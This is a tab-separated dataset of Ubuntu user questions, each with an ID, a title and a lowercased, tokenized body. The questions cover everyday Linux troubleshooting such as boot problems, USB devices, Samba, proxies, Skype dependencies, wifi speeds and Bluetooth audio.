476776	one thread hinders the other in initializing serial port	i 've been struggling for this problem for a long time . i have two peripheral devices a and b that communicate with the software with usb serial ports . b has its own .jar file for finding and connecting the correct serial port . a uses my code to connect to the port . problem is that b s ' library loops over every serial port and tries to connect to device b . if no success on /dev/ttyusb0 it moves to /dev/ttyusb1 and etc . it finds the device b and connects to it . when i run my code to connect to device a on port /dev/ttyusb0 , the initialization code hangs on the midway . i 've made several experiments . to make a long story short , if b s ' initialization process touches a s ' port , a can no longer be connected to pc . i 'm using ubuntu 12.04 . is there a way to prevent same process from trying to connect twice to the same serial port ? or do you know another solution ?
476777	xubuntu 14.04 will not boot after preseed installation	i recently set up xubuntu 14.04 installation using preseed , and ran into a couple of problems during boot time . at first , right after the installation completed during first boot the system complained about /tmp not being mounted and did not proceed any further . i was able to fix that problem by making an entry for /tmp in /etc/fstab like so : tmpfs /tmp tmpfs optional , nodev , nosuid 0 0 this worked for a while ( and still does for workstations that are already running ) , but newly installed machines are broken . they do not complain like before , but take forever to boot ( > 2h ) and it seems the root partition is mounted read only and you can not do anything useful with the system . any ideas on what to do ? you can find the presseed file here thanks in advance update : if i get it to boot once via some magic in rescue mode ( like simply mounting the root partition read-write , then resume boot ) it will work forever . while this is a workaround , it is no option to do this for every installation .
476778	dual boot , dual hard drives !	i 'm posting this question after reading most of similar ones . my situation is different here in the fact that i 'm installing on ssd and not partitioning my hdd , and that i can actually boot ! i 'm just looking to improve the convenience of having easier way to choose . 1- i have a dell inspiron 15r se . it has hdd ( 1tb ) and ssd ( 32gb ) . i managed to do whatever things i did in distant past to set the ssd free ( i do n't really care how fast my system boots ) . now i wanted to install linux on the ssd and leave the hdd untouched . it 's way too precious for me to mess with it . so , i repartitioned the ssd to : 30gb for /root , 1gb for /swap , and 100mb for /boot . i installed linux on the root and the grub on boot ( of the ssd ) . now grub immediately boots into linux and does n't allow me to boot to windows . but ! if i enable uefi boot manager and choose `` windows boot manager '' after hitting f12 , i can boot into windows 8 normally . i 'd say that 's pretty ok , except , i 'd prefer to have the option to boot into which one or at the very least , default to boot to windows . 2- i 'm concerned that if i now delete the ssd partition , that the boot will break and i wo n't be able to boot anything ! does this seem like a valid concern ? i made that choice of having linux on ssd because i 'm going to be training on it , so i expect multiple resets from time to time .
476779	usb camera stops being recognized by os	on boot a clean boot after first seating the camera the os will recognize my web cam but after accessing it and releasing it numerous times over the up time of the system ( through v4l , specifically gstreamer ) the camera will at some point stop being recognized by the os ( no longer shows up in /dev/ ) . it will still not be seen by the os even after a boot when this occurs and i have to re-seat the camera . it can even be in the same usb port . what could be causing this ? would it be better to dig down into the camera drivers or the usb hub ? i am using the usb 3.0 hub on the board , the bios is set to always power up those ports and so i do not rely on the board auto configuring them . specs : version : linux 3.11.0-19-generic # 33-ubuntu i686 gnu/linux board : asrock imb-150 camera : lifecam studio
476783	ubuntu 14.04 and samba 4.1.6	can any one please confirm if the current versions of ubuntu and samba seems to work as expected ? i 'm not able to use smbclient ( or log in from a winbox ) without getting different error codes . there might be a hint in the fact that i 'm using the current version of webmin to add unix users but there is not much going on over at their forum regarding their samba module . any help would be apreciated !
476784	how do i make apt-get install commands not display every package that is installing ?	when i install something on terminal , it often shows me a few things for status . for one , it shows download rate ( which is fine ) . however , when i install something , it can display unpacking libgranite2 : amd64 ( 0.3.0~r732+pkg64~ubuntu0.3.1 ) ... selecting previously unselected package slingshot-launcher . preparing to unpack ... /slingshot-launcher_0.7.6.1+r421+pkg32~ubuntu0.3.1_amd64.deb ... unpacking slingshot-launcher ( 0.7.6.1+r421+pkg32~ubuntu0.3.1 ) ... selecting previously unselected package contractor . preparing to unpack ... /contractor_0.3.1~r136+pkg22~ubuntu0.3.1_amd64.deb ... unpacking contractor ( 0.3.1~r136+pkg22~ubuntu0.3.1 ) ... selecting previously unselected package apport-hooks-elementary . preparing to unpack ... /apport-hooks-elementary_0.1-0~35~saucy1_all.deb ... unpacking apport-hooks-elementary ( 0.1-0~35~saucy1 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for libglib2.0-0 : amd64 ( 2.40.0-2 ) ... processing triggers for man-db ( 2.6.7.1-1 ) ... setting up libgranite-common ( 0.3.0~r732+pkg64~ubuntu0.3.1 ) ... setting up libgranite2 : amd64 ( 0.3.0~r732+pkg64~ubuntu0.3.1 ) ... setting up slingshot-launcher ( 0.7.6.1+r421+pkg32~ubuntu0.3.1 ) ... setting up contractor ( 0.3.1~r136+pkg22~ubuntu0.3.1 ) ... setting up apport-hooks-elementary ( 0.1-0~35~saucy1 ) ... processing triggers for libc-bin ( 2.19-0ubuntu6 ) .. i would rather that not show up . i only want to see download rate , not all that other stuff . how do i do this ? edit : i would also like the jargon to be stored somwehre else if something goes wrong , or for the jargon to just be expanable on terminal .
476786	global proxy for ubuntu	is there a way to setup a global proxy fro ubuntu ? for example , i have some php code which is an 'off the shelf ' product ( i do n't want to change the source code to this ) , i have some php code which uses tcp sockets . i just want everything to go through a proxy.. telnet included.. is there a way to do this or am i asking for too much ? the painful alternative to this is to configure each product which runs on this server to specifically use the proxy ( e.g . curl_setopts in the php application ) . i have obviously tried the /etc/environment file , which does n't enforce global proxy usage . thanks
476787	which user is logged in , with likewise and ubuntu12.4 ?	i need to know which user is logged in my computer but with likewise package installed it does not work . i 've used the following commands who users psutil.get_users ( ) [ with python ] in all cases the result is [ ] empty , nothing any tips ? i 'm using python3 ubuntu12.4 and psutil 0.51
476788	dlna media server and external subtitles	i 'm looking dlna media server with the features above : support most extended video formats . reproduce external subtitles in client side . open source or freeware software . use case : dlna media server installed and running on my pc . in my pc , i have /home/myprofile/videos directory where i store all my video files . for example , game.of.thrones.s09.e06.mpg and game.of.thrones.s09.e06.srt turn on my smart-tv , connect to my dlna media server ( installed on my pc ) play game.of.thrones.s09.e06.mpg file and see the subtitles overlapped . finally , my question : is there some dlna media server that provides that use case ? . thank you .
476792	apache2 ssl cert , shows contents of redmine directory	i have an ubuntu 12.04 server where i have successfully installed redmine . i tried setting up an ssl cert on the server using this tutorial : https : //www.digitalocean.com/community/articles/how-to-create-a-ssl-certificate-on-apache-for-ubuntu-12-04 i am still able to access the site using http : // , but when i try to use https : // , i just see the contents or index of ... files . i 'm not really sure where to begin , or even which information from my server to post here to get an answer . please let me know in the comments what information would be helpful , and i 'll gladly post it . thanks , partial contents of /etc/apache2/sites-available/default-ssl < ifmodule mod_ssl.c > < virtualhost _default_:443 > serveradmin my.email @ mydomain.com servername my.site.com:443 documentroot /var/www/redmine < directory / > options followsymlinks allowoverride none < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory >
476793	how to change the default desktop environment ( that appears in the greeter ) in 14.04	previously i navigated to /etc/lightdm/lightdm.conf and changed user-session=ubuntu . lightdm.conf does n't exist in ubuntu 14.04 at that location , so how do i change user-session=ubuntu to something else ? 14.04 : 12.04 :
476795	wireless problem	on the desktop of my mother ( acer aspire 5336 ) the wireless connection is buggy . wireless is turned on , but i ca n't connect to a network . after a few reboots , it works again , but how can i let them automatic connect ? os : ubuntu 14.04 32 bit .
476796	ca n't find my installed application ( vpython )	i am using ubuntu 10.4 and just installed vpython but could not find it to run . in the software center , its showing that it is installed . i tried alt+f2 but it says could not open location . can anyone help me with it . thank you in advance .
476797	kubuntu 14.04 + kdm sound works only when logged in as root	i am not advocating logging in as root . but i found that sound works when i do . when i log in as a normal user- no sound , no mixer , no hint that the machine even has an audio device . where do i even begin to troubleshoot this ?
476803	set up nginx and bought a domain . how to connect the two ?	i have set up nginx on my vserver and it seems to be working properly . i also purchased a domain at nic.md now it 's asking me for ns host names and addresses . googling did not help much . do i need to run my own dns server ? https : //dl.dropboxusercontent.com/u/8516328/screenshot % 20from % 202014-06-04 % 2018 % 3a03 % 3a21.png advice would be greatly appreciated . sorry if this is the wrong place to ask .
476813	ladder loigic software for ubuntu	i just started a class on industrial motor controls . i am thinking it would be handy to have a ladder logic diagram software to help me draw , program , and become familiar with plcs and ladder logic diagrams . does anyone know a decent program to do that ? i tooled around in the repos for a bit , but found nothing on ladder logic .
476817	xchat irc fails to connect when vpn si on	i 'm using a vpn from securitykiss.com by simply adding the username and pass and simply connecting . i 'm a noob at linux so please help . i 'm trying to use xchat irc with my vpn connected but i ca n't connect to any server . can someone please help me ? i tried looking for solutions on the internet but i can not seem to find this kind of problem at anyone . it sucks that i have to close my vpn so i can use the xchat irc . 10x
476821	can i add custom options to text selection right click menu in gnome ?	nautilus-actions is great for adding items to file right click menu , but can i add items to the right click menu of a text selection anywhere in gnome ? for example i 'd like to be able to right click on a selected path and `` open in terminal '' or `` open in nautilus '' cheers
476824	enabling acceleration tab on virtualbox manager running on ubuntu 12.04 ( guest os )	i have a windows 7 host os . hw virtualization is enabled in the bios . on oracle vm virtualbox added a ubuntu 12.04 guest os . configured it as 64 bit . note : the system- > acceleration is enabled and `` enable vt-x/amd-v '' is enabled . also the other nested paging one . booted 64 bit ubuntu 12.04 guest os . the booting went fine . now , for some multiple system installation purposes , i need oracle vm virtualbox in the ubuntu 12.04 guest os . installed the virtualbox and the addons . now in the guest os virtualbox system- > acceleration is not enabled . can anyone suggest how we could get the acceleration enabled on the oracle vm virtualbox running on guest os ( ubuntu 12.04 ) . please note oracle vm virtualbox is running on a guest ubuntu os .
476830	ubuntu 14.04 lts online accounts	i am new in ubuntu , and try to setup my facebook account on my desktop in order to online chat/messaging via my fb account , but when i click on facebook on system settings > online accounts it gives blank page and write that ; you have to capacitate ubuntu to access facebook account . what should i do to give that capacitate ? and also i tried to use facebook messenger and empathy and they just give me the blank page , too .
476831	how do i make hostapd autorun at login ?	i 'm using hostapd for sharing wired internet but everytime i reboot the computer , i have to start terminal and type `` sudo ap-hotspot start '' is there anyway to make hostapd autorun at login ?
476832	extracting multiple rpm files and overwrite existing files	i have a bunch of rpm files in a directory , where all rpm files are extracted as /usr/.. i would like to extract all rpm files and overwrite existing files . i normally do that with file-roller -f *.rpm which brings up the gui to ask the location to extract and then doing its work . as file-roller is crashing on 14.04 ( last time i did this was on 12.04 ) im searching for another way to do this work if i use the file-roller gui ( selecting all rpm files in nautilus ) and say extract here this will result in having several folders usr , usr ( 1 ) , usr ( 2 ) ... usr ( 102 ) . is there any app or another way i can use ?
476833	i ca n't install skype on ubuntu 14.04 64-bit	i 've tried lots of tutorials i found online , but i ca n't install skype . apt-get gives me this error : ( but synaptic does n't report any broken packages ) some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . aptitude gives me this error : the following new packages will be installed : libdbusmenu-qt2 : i386 { a } libdrm-intel1 : i386 { ab } libdrm-nouveau2 : i386 { ab } libdrm-radeon1 : i386 { ab } libdrm2 : i386 { ab } libgl1-mesa-dri : i386 { ab } libgl1-mesa-glx : i386 { ab } libglapi-mesa : i386 { ab } libqt4-opengl : i386 { a } libqtwebkit4 : i386 { a } skype skype-bin : i386 { a } sni-qt : i386 { a } 0 packages upgraded , 13 newly installed , 0 to remove and 57 not upgraded . need to get 31,7 mb of archives . after unpacking 111 mb will be used . the following packages have unmet dependencies : libdrm-intel1 : breaks : libdrm-intel1 : i386 ( ! = 2.4.54+git20140523.8fc62ca8-0ubuntu0ricotz~trusty ) but 2.4.52-1 is to be installed . libdrm-intel1 : i386 : breaks : libdrm-intel1 ( ! = 2.4.52-1 ) but 2.4.54+git20140523.8fc62ca8-0ubuntu0ricotz~trusty is installed . libgl1-mesa-dri : breaks : libgl1-mesa-dri : i386 ( ! = 10.3.0~git20140530.ebf229a4-0ubuntu0ricotz~trusty ) but 10.1.0-4ubuntu5 is to be installed . libgl1-mesa-dri : i386 : breaks : libgl1-mesa-dri ( ! = 10.1.0-4ubuntu5 ) but 10.3.0~git20140530.ebf229a4-0ubuntu0ricotz~trusty is installed . libdrm-radeon1 : breaks : libdrm-radeon1 : i386 ( ! = 2.4.54+git20140523.8fc62ca8-0ubuntu0ricotz~trusty ) but 2.4.52-1 is to be installed . libdrm-radeon1 : i386 : breaks : libdrm-radeon1 ( ! = 2.4.52-1 ) but 2.4.54+git20140523.8fc62ca8-0ubuntu0ricotz~trusty is installed . libglapi-mesa : breaks : libglapi-mesa : i386 ( ! = 10.3.0~git20140530.ebf229a4-0ubuntu0ricotz~trusty ) but 10.1.0-4ubuntu5 is to be installed . libglapi-mesa : i386 : breaks : libglapi-mesa ( ! = 10.1.0-4ubuntu5 ) but 10.3.0~git20140530.ebf229a4-0ubuntu0ricotz~trusty is installed . libgl1-mesa-glx : breaks : libgl1-mesa-glx : i386 ( ! = 10.3.0~git20140530.ebf229a4-0ubuntu0ricotz~trusty ) but 10.1.0-4ubuntu5 is to be installed . libgl1-mesa-glx : i386 : breaks : libgl1-mesa-glx ( ! = 10.1.0-4ubuntu5 ) but 10.3.0~git20140530.ebf229a4-0ubuntu0ricotz~trusty is installed . libdrm-nouveau2 : breaks : libdrm-nouveau2 : i386 ( ! = 2.4.54+git20140523.8fc62ca8-0ubuntu0ricotz~trusty ) but 2.4.52-1 is to be installed . libdrm-nouveau2 : i386 : breaks : libdrm-nouveau2 ( ! = 2.4.52-1 ) but 2.4.54+git20140523.8fc62ca8-0ubuntu0ricotz~trusty is installed . libdrm2 : breaks : libdrm2 : i386 ( ! = 2.4.54+git20140523.8fc62ca8-0ubuntu0ricotz~trusty ) but 2.4.52-1 is to be installed . libdrm2 : i386 : breaks : libdrm2 ( ! = 2.4.52-1 ) but 2.4.54+git20140523.8fc62ca8-0ubuntu0ricotz~trusty is installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) libdrm-intel1 : i386 [ not installed ] 2 ) libdrm-nouveau2 : i386 [ not installed ] 3 ) libdrm-radeon1 : i386 [ not installed ] 4 ) libdrm2 : i386 [ not installed ] 5 ) libgl1-mesa-dri : i386 [ not installed ] 6 ) libgl1-mesa-glx : i386 [ not installed ] 7 ) libglapi-mesa : i386 [ not installed ] 8 ) libqt4-opengl : i386 [ not installed ] 9 ) libqtwebkit4 : i386 [ not installed ] 10 ) skype [ not installed ] 11 ) skype-bin : i386 [ not installed ] leave the following dependencies unresolved : 12 ) libgl1-mesa-glx : i386 recommends libgl1-mesa-dri : i386 ( > = 7.2 ) accept this solution ? [ y/n/q/ ? ] and none of the solutions work . can someone help me ?
476835	short but ( very ) consistent lag spikes after upgrading to ubuntu 14.04	after upgrading to ubuntu 14.04 i started noticing short but consistent spikes in my daily internet usage ( it became most apparent when playing online games through steam ) . these spikes occur every ~2 minutes or so and last a few seconds after which everything goes back to acceptable speeds . when using the ping command against my router i get tons of packets that takes 0.4 to 0.8 ms which is fine . then when these spikes occur i get roughly 10 packets , all of which takes 200-350 ( or more ) ms . the thing is that this did n't happen at all with ubuntu 13.10 , i should probably also mention that i 'm using internet over wi-fi . i 've tried to identify the source of these spikes with nethogs , iftop , wireshark , etherape and whatnot without much success ( i 've never had to track down similar problems so i might be looking at things incorrectly ) . any idea what might be causing this ?
476838	i do n't know how to install ubuntu on acer aspire netbook	i downloaded the universal usb installer 1.9.5.3 for ubuntu , but after saving the .iso file and creating it on my usb , i do n't know what else to do , since there are no prompts to install ubuntu . tried pressing f12 , but no effect . thanks , silvia
476839	usb errors and warnings on dmesg	i was using ubuntu 12.04 lts and booting was very slow and the following error appeared many times on the screen while loading , like this : unable to enumerate usb device on port 7 unable to enumerate usb device on port 7 unable to enumerate usb device on port 7 unable to enumerate usb device on port 7 ... running command dmesg showed this error hundreds of times and there was another repetitive message : new full speed usb device number xx using ehci_hcd ( replacing `` xx '' with two different numbers every time ) . to avoid this , i upgraded to ubuntu 14.04 lts and the message unable to enumerate usb device on port 7 has disappeared , but the other message keeps going on and dmesg is full of this message new full speed usb device number xx using ehci_hcd . i 'm using an hp pavilion dv6 on a x64 machine with kernel : 3.13.0-24-generic this happens even with no devices plugged into the laptop and all the usb connectors work . do you have any ideas on this ? is this a real problem ? is this a software or a hardware issue ? when googling , i 've seen that this seemed to be a problem in year 2008 . so , i do n't know what 's happening here ! note : another laptop ( toshiba portege ) does n't show any of these messages on dmesg and it 's running ubuntu 12.04 .
476840	problem with pinta : it works & loads but it wo n't copy & paste properly	i 'm using the lubuntu os & have been having problems with pinta since installing it . pinta will launch & work but the only problems i 've been having is that pinta does n't copy images over properly . here 's the issue given to me by pinta : system.reflection.targetinvocationexception : exception has been thrown by the target of an invocation . -- - > system.argumentnullexception : argument can not be null . parameter name : src at ( wrapper managed-to-native ) system.runtime.interopservices.marshal : copy_from_unmanaged ( intptr , int , system.array , int ) at system.runtime.interopservices.marshal.copy ( intptr source , system.byte [ ] destination , int32 startindex , int32 length ) [ 0x00000 ] in < filename unknown > :0 at cairo.imagesurface.get_data ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.core.cairoextensions.topixbuf ( cairo.imagesurface surfsource ) [ 0x00000 ] in < filename unknown > :0 at pinta.core.editactions.handlerpintacoreactionseditcopyactivated ( system.object sender , system.eventargs e ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper managed-to-native ) system.reflection.monomethod : internalinvoke ( system.reflection.monomethod , object , object [ ] , system.exception & ) at system.reflection.monomethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at system.reflection.monomethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.methodbase.invoke ( system.object obj , system.object [ ] parameters ) [ 0x00000 ] in < filename unknown > :0 at system.delegate.dynamicinvokeimpl ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at system.multicastdelegate.dynamicinvokeimpl ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at system.delegate.dynamicinvoke ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at glib.signal.closureinvokedcb ( system.object o , glib.closureinvokedargs args ) [ 0x00000 ] in < filename unknown > :0 at glib.signalclosure.invoke ( glib.closureinvokedargs args ) [ 0x00000 ] in < filename unknown > :0 at glib.signalclosure.marshalcallback ( intptr raw_closure , intptr return_val , uint32 n_param_vals , intptr param_values , intptr invocation_hint , intptr marshal_data ) [ 0x00000 ] in < filename unknown > :0
476843	how to share files between two ubuntu 14.04 computers	i 've trying to share files between my two computers by wifi and samba . i checked share option in folder properties and tried to connect to other computer by smb : //ip . but without succes . could some one hep me how to do this step by step . maybe i did something wrong ...
476846	ubuntu 14.04 is n't detecting my usb headset	i 'm having problems getting ubuntu gnome 14.04 to detect my g35 logitech headset . i 've tried to plug it in and go to system_settings/sound but the device is not appearing in the output nor the input tab . my speakers do appear and are working perfectly fine . analog headphones are working as well . lsusb prints : bus 002 device 003 : id 0738:1708 mad catz , inc . bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 002 : id 046d:0a15 logitech , inc . bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 1ea7:2001 bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
476852	how to specify button and tab border colours in gtk+ 3 theme	the theme `` ambiance '' has buttons and tabs looking like this : i am trying to make a theme , but am having difficulty finding out how to change the button and tab border colours . the theme looks like this : how could i add light borders to the button and to the tabs ?
476858	ubuntu 14.04 wine program files association	this question has been asked in a general way before , but this is my first week with ubuntu and i ca n't understand all the instructions here : how to associate a file with a program installed in wine danne 's answer was : 'right click , open with other application . if your application is not available in the list , use custom command and put wine ~/.wine/drive_c/program\ files/yourapp/yourapp.exe in the box . ' what is 'custom command ' ? i also saw the instructions at https : //help.ubuntu.com/community/wine # creating_file_associations but the other way looks easier.. in particular i want to open pdf files with sumatra pdf . i have ubuntu 14.04 . thanks for your help , andrew
476861	wireless n 300mbps missing in ubuntu	i have very odd problem . first of all my setup : wifi router - mikrotik 2011uas-2hnd-in client 1 - ubuntu 14.04 with network controller : intel corporation centrino wireless-n 1000 [ condor peak ] client 2 - windows 7 with network controller : intel corporation centrino wireless-n 1000 [ condor peak ] the problem is that windows client is linking to the router with 300mbps and linux client is linking with max of 150 mbps . i 'm pretty sure that router is right configured . also tried client 1 with windows setup and guess what ... it 's linking with 300mbps . so my guess is that something wrong going on with ubuntu . tried the mainline kernel ( 3.14.5 ) and default 3.13.0-27-generic , still no change . here is some useful output from ubuntu : grep -ir [ a-z0-9 ] /sys/module/iwlwifi/parameters/ /sys/module/iwlwifi/parameters/swcrypto:0 /sys/module/iwlwifi/parameters/power_save : n /sys/module/iwlwifi/parameters/led_mode:0 /sys/module/iwlwifi/parameters/amsdu_size_8k:0 /sys/module/iwlwifi/parameters/fw_restart : y /sys/module/iwlwifi/parameters/bt_coex_active : y /sys/module/iwlwifi/parameters/11n_disable:0 /sys/module/iwlwifi/parameters/antenna_coupling:0 /sys/module/iwlwifi/parameters/wd_disable:1 /sys/module/iwlwifi/parameters/power_level:0 iw list wiphy phy0 band 1 : capabilities : 0x1072 ht20/ht40 static sm power save rx greenfield rx ht20 sgi rx ht40 sgi no rx stbc max amsdu length : 3839 bytes dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 4 usec ( 0x05 ) ht rx mcs rate indexes supported : 0-15 , 32 tx unequal modulation not supported ht tx max spatial streams : 1 ht tx mcs rate indexes supported may differ frequencies : * 2412 mhz [ 1 ] ( 14.0 dbm ) * 2417 mhz [ 2 ] ( 14.0 dbm ) * 2422 mhz [ 3 ] ( 14.0 dbm ) * 2427 mhz [ 4 ] ( 14.0 dbm ) * 2432 mhz [ 5 ] ( 14.0 dbm ) * 2437 mhz [ 6 ] ( 14.0 dbm ) * 2442 mhz [ 7 ] ( 14.0 dbm ) * 2447 mhz [ 8 ] ( 14.0 dbm ) * 2452 mhz [ 9 ] ( 14.0 dbm ) * 2457 mhz [ 10 ] ( 14.0 dbm ) * 2462 mhz [ 11 ] ( 14.0 dbm ) * 2467 mhz [ 12 ] ( 14.0 dbm ) ( passive scanning , no ibss ) * 2472 mhz [ 13 ] ( 14.0 dbm ) ( passive scanning , no ibss ) bitrates ( non-ht ) : * 1.0 mbps * 2.0 mbps ( short preamble supported ) * 5.5 mbps ( short preamble supported ) * 11.0 mbps ( short preamble supported ) * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps max # scan ssids : 20 max scan ies length : 195 bytes coverage class : 0 ( up to 0m ) supported ciphers : * wep40 ( 00-0f-ac:1 ) * wep104 ( 00-0f-ac:5 ) * tkip ( 00-0f-ac:2 ) * ccmp ( 00-0f-ac:4 ) available antennas : tx 0 rx 0 supported interface modes : * ibss * managed * monitor software interface modes ( can always be added ) : * monitor interface combinations are not supported supported commands : * new_interface * set_interface * new_key * new_beacon * new_station * new_mpath * set_mesh_params * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * join_mesh * set_tx_bitrate_mask * action * frame_wait_cancel * set_wiphy_netns * set_channel * set_wds_peer * unknown command ( 84 ) * unknown command ( 87 ) * unknown command ( 85 ) * unknown command ( 89 ) * unknown command ( 92 ) * unknown command ( 104 ) * testmode * connect * disconnect supported tx frame types : * ibss : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * managed : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * ap : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * ap/vlan : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * mesh point : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * p2p-client : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * p2p-go : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 * unknown mode ( 10 ) : 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0 supported rx frame types : * ibss : 0x40 0xb0 0xc0 0xd0 * managed : 0x40 0xd0 * ap : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * ap/vlan : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * mesh point : 0xb0 0xc0 0xd0 * p2p-client : 0x40 0xd0 * p2p-go : 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0 * unknown mode ( 10 ) : 0x40 0xd0 device supports rsn-ibss . ht capability overrides : * mcs : ff ff ff ff ff ff ff ff ff ff * maximum a-msdu length * supported channel width * short gi for 40 mhz * max a-mpdu length exponent * min mpdu start spacing device supports tx status socket option . device supports ht-ibss . iw dev wlan0 link connected to d4 : ca:6d : e6:18 : a3 ( on wlan0 ) ssid : cvetybaby freq : 2422 rx : 113048205 bytes ( 122363 packets ) tx : 67479855 bytes ( 74096 packets ) signal : -35 dbm tx bitrate : 150.0 mbit/s mcs 7 40mhz short gi bss flags : short-preamble short-slot-time dtim period : 0 beacon int : 100 when i try to set mcs index to 15 with : # iw dev wlan0 set bitrates mcs-2.4 15 it 's showing : tx bitrate : 1mbit/s
476862	print out the amount of times 2 words appear in the syslog . but also have it tell me how many times for each hour	so i 'm trying to create a bash script that looks for two words in my syslog file . then i want the script to print out how many times those two words have appeared . also i want it to print it out for every hour of the day . so like if the word dog appeared 4 times during the first hour of today , it says hour one , dog 4 . finally at the end of the script i want it to print out how many times those words appeared all day . the sudo code i have thus far is if 2 > hour find permit find block print both finish if 1 < hour < 2 find permit find block print both finish if 2 < hour < 3 find permit find block print both finish command is grep -o `` \word\ '' syslog.txt * | sort | uniq -c
476869	cronjob output will not show in terminal	i 've been trying to get the output of a cronjob to show in the terminal and i ca n't figure it out . every minute i would like to run the script /usr/games/sl and have it output in the terminal , and i 've tried a few different ways , mainly the ones in this post . i ca n't just write the output to a text file because the command moves across the screen , and it gives gibberish when viewed with tail or nano . i have two different variations in the crontab file at the moment : * * * * * /usr/games/sl > /dev/pts/2 2 > & 1 * * * * * /usr/games/sl > /dev/tty1 2 > & 1 the second one at least gives me an error , error opening terminal : unknown . which i think is because i 'm using tty1 and not pts/2 . i do n't really understand how terminals and all of that stuff work yet , so i am stuck at the moment . does anyone have a suggestion on how i can view the cronjob in real time ? tl ; dr every minute i want the sl command to run on the screen and show the output . i tried with cronjobs and failed .
476877	vnc connection in ubuntu 14.04 disconnects my wifi	i 'm using ubuntu 14.04 lts on a asus vivopc-60 . when i installed it i had a few problems with the embedded wireless , it would n't see any networks , but after a reinstall , i had no more problems of that sort . but now , i want to set my vivopc screen-less and connect to it with my windows 7 rig present on the same network through ubuntu 's desktop sharing and a vnc client . everytime i do , it disconnects after a few seconds and it kills my wireless connection . the network manager does n't see my wifi network anymore and i have to reboot ubuntu to connect to my wifi again . it does the same thing when i connect from a distant computer using my noip domain name . i used tightvnc and i found someone with the same problem who resolved it using a different vnc viewer ( ultravnc ) i did the same but the connection gets killed the same way . i do n't know what to do . i 'm using ubuntu 14.04 with the 3.13.0-24 kernel . thanks for your help .
476883	partitioning for dual boot windows 8.1/ ubuntu hdd	so i got a blank 750 gb hdd on a laptop . my intention is to install windows 8.1 only on a single partion like a 100 gb for the system only to use it for my university programs etc . and to use ubuntu for personal use like browsing , listening to music . for example windows 8 to be only 100 gb and the other free space to be for ubuntu and i know ubuntu has to be on separate partiotions like the swap , / ( root ) , /home . can you tell me how to do it or a walkthrough ?
476885	write access to linux ext3 files from windos 7	i 've a dual boot system with ubuntu 12.04 and windows 7 . i can access my linux files ( partition format is ext3 ) from windows , but i can not write to them . i 've edited the properties of the linux drive from ext2fsd : properties - > security , etc everything in sight has full control . when i look at the properties of the linux folder from windows explorer , again , everybody has write access . but whenever i try to write to the disk , i 'm told that the disk is write-protected . on the linux side , the permission settings on the folder is 777 any help would be most appreciated .
476888	jbl bluetooth speakers play no sound , a2dp off ?	i have jbl bluetooth speakers like this one . with ubuntu 14.04 lts ( gnome ) i get it to pair with my pc , either with gnome-bluez or blueman , but i am unable to reproduce any sound . i stumbled upon this website here , but did not managed to get it to work . i see that i can not change my speakers in the gnome sound menu from internal to the one unplugged ( to my bluetooth speakers ) , but i can see another profile `` unplugged '' available with pavucontrol . however , when i change it to that profile , i hear no sound . the aforementioned blog post says to change the connection with the jbl flip from headset mode to a2dp mode in blueman , but i received the following error message `` the device has been added successfully , but failed to connect with ubuntu '' . does anyone know how to solve that issue ? p.s . : i see a lot of unanswered/ unresolved question to this all over the internet , i can not believe that ubuntu ( 14.04 ) would not handle this speakers .
